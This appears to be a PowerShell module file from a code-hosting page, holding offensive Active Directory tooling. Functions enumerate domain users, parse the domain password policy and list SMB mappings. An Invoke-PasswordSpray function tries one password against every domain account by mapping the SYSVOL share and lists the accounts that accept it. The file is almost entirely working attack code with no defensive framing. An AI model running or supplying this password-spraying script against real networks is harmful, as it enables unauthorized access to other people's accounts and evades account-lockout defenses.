-
Notifications
You must be signed in to change notification settings - Fork 11
/
net.psm1
75 lines (63 loc) · 2.33 KB
/
net.psm1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
Function Get-DomainUsers(){
$output = net user /domain;$output = $output[6..($output.length-3)];$output = $output -split "\s+" ;$output = $output | ? {$_}
$UserNames = $output
$UserNames
}
Function Get-DomainPasswordPolicy(){
$output = net accounts /domain;$output = $output[2..($output.length-3)]
$ouput
$props = @{
ForceUserLogOff = (($output -split '[\r\n]')[0].split(':')[1]).trim()
MinPwAge = (($output -split '[\r\n]')[1].split(':')[1]).trim()
MaxPwAge = (($output -split '[\r\n]')[2].split(':')[1]).trim()
MinPwLength = (($output -split '[\r\n]')[3].split(':')[1]).trim()
PwHistory = (($output -split '[\r\n]')[4].split(':')[1]).trim()
LOThreshold = (($output -split '[\r\n]')[5].split(':')[1]).trim()
LODuration = (($output -split '[\r\n]')[6].split(':')[1]).trim()
LOWindow = (($output -split '[\r\n]')[7].split(':')[1]).trim()
CompRole = (($output -split '[\r\n]')[8].split(':')[1]).trim()
}
return New-Object PSObject -property $props
}
Function Get-SMBConnections(){
$output = net use ;$output = $output[6..($output.length-3)]
$output = ($output -split '[\r\n]') |? {$_}
$array = @()
foreach($line in $output){
$object = [PSCustomOBject]@{
'Status' = ($line -split '\s\s+')[0]
'DriveLetter' = ($line -split '\s\s+')[1]
'UNCPath' = ($line -split '\s\s+')[2]
'Type' = ($line -split '\s\s+')[3]
}
$array += $object
}
$array
}
Function Invoke-PasswordSpray(){
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True)]
[string]$Password,
[parameter(Mandatory=$True)]
[string]$DriveLetter
)
Function DriveCheck(){$output = Get-WMIObject -query 'Select * From Win32_LogicalDisk Where DriveType = 4' | Select-Object DeviceID, ProviderName|where {$_.DeviceID -eq $DriveLetter};$output}
if (Drivecheck -eq !Null){(New-Object -ComObject WScript.Network).RemoveNetworkDrive($DriveLetter, 1)}
$usernames = get-domainusers
$UNCPath = '\\' + (Get-WmiObject Win32_ComputerSystem).Domain + '\sysvol'
write-host Testing Passwords to $UNCPath
$array01 = @()
foreach($name in $usernames){
$name = $name + '@' + (Get-WmiObject Win32_ComputerSystem).Domain
$net = new-object -ComObject WScript.Network
try{
$net.MapNetworkDrive($DriveLetter, $UNCPath, $false, $name, $password)
}
catch {Continue}
$var = $name + ' Is using Password ' + $Password
$array01 += $var
if (Drivecheck -eq !Null){(New-Object -ComObject WScript.Network).RemoveNetworkDrive($DriveLetter, 1)}
}
$array01
}